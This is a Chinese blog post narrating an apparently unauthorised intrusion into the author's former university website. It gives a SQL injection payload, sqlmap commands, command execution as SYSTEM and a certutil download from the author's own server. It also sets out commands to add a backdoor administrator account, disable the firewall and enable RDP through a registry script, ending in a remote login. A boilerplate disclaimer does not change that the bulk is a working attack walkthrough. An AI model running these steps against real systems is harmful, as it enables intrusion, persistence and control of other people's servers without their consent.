实战 | 记一次对母校站点的渗透测试

  • A+
所属分类:安全文章

声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。

前言


备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)
实战 | 记一次对母校站点的渗透测试
测试到注入
http://url/newdetail.aspx?id=11999' or 1=1 --
直接Sqlmap一把过 , 连waf都没得(狗头)
随便看看
python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbspython sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users
实战 | 记一次对母校站点的渗透测试
DBMS
sqlserver 2005
实战 | 记一次对母校站点的渗透测试
whoami
在windows中nt authority system 是内置的系统管理账户
实战 | 记一次对母校站点的渗透测试
查看下目录chdir
实战 | 记一次对母校站点的渗透测试
Dir c:
实战 | 记一次对母校站点的渗透测试
OS版本
Microsoft(R) Windows(R) Server 2003, Enterprise Edition
实战 | 记一次对母校站点的渗透测试
ipconfig
实战 | 记一次对母校站点的渗透测试
服务器端存在certutil等于是决定测试一下命令
vps
python -m SimpleHTTPServer 80


打一下
ping wt070h.dnslog.cncertutil.exe -urlcache -split -f http://funny_ip/amazing1x
发现回显
实战 | 记一次对母校站点的渗透测试

奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果
实战 | 记一次对母校站点的渗透测试
看看环境变量
实战 | 记一次对母校站点的渗透测试
Nmap看看端口
因为尝试远程连接的时候出了一些问题,起初不知道是什么原因所以打算看看
实战 | 记一次对母校站点的渗透测试
尝试远程连接3389
新建用户
#新建用户net user amazingadmin123 amazing.123456 /add#赋予权限net localgroup Administrators amazingadmin123 /add#激活用户net user amazingadmin123 /active:yes#关闭防火墙netsh firewall set opmode mode=disable#开启默认设置 netsh firewall reset
通过注册表开启3389端口
echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000 >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp] >>3389.reg echo "ortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regregedit /s 3389.reg
相关记录
实战 | 记一次对母校站点的渗透测试
相关记录
实战 | 记一次对母校站点的渗透测试
这个过程连续尝试了两三次都没有成功,也没找到原因,服务还关了,只能先考试等管理员开机了
实战 | 记一次对母校站点的渗透测试
考完试第三天网站上线了,再试试新建用户……
原来是安全策略的问题,不能使用简单地密码,新建用户的时候用了个复杂的密码就行了
远程连接✔️
实战 | 记一次对母校站点的渗透测试
配置加载中……
实战 | 记一次对母校站点的渗透测试
实战 | 记一次对母校站点的渗透测试

点到即止!


文章来源:先知社区

作者:何止

如有侵权,请联系删除

实战 | 记一次对母校站点的渗透测试
干货|渗透学习资料大集合(书籍、工具、技术文档、视频教程)
实战 | 记一次对母校站点的渗透测试
关注公众号:HACK之道
如文章对你有帮助,请支持点下“赞”“在看”

本文始发于微信公众号(HACK之道):实战 | 记一次对母校站点的渗透测试

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: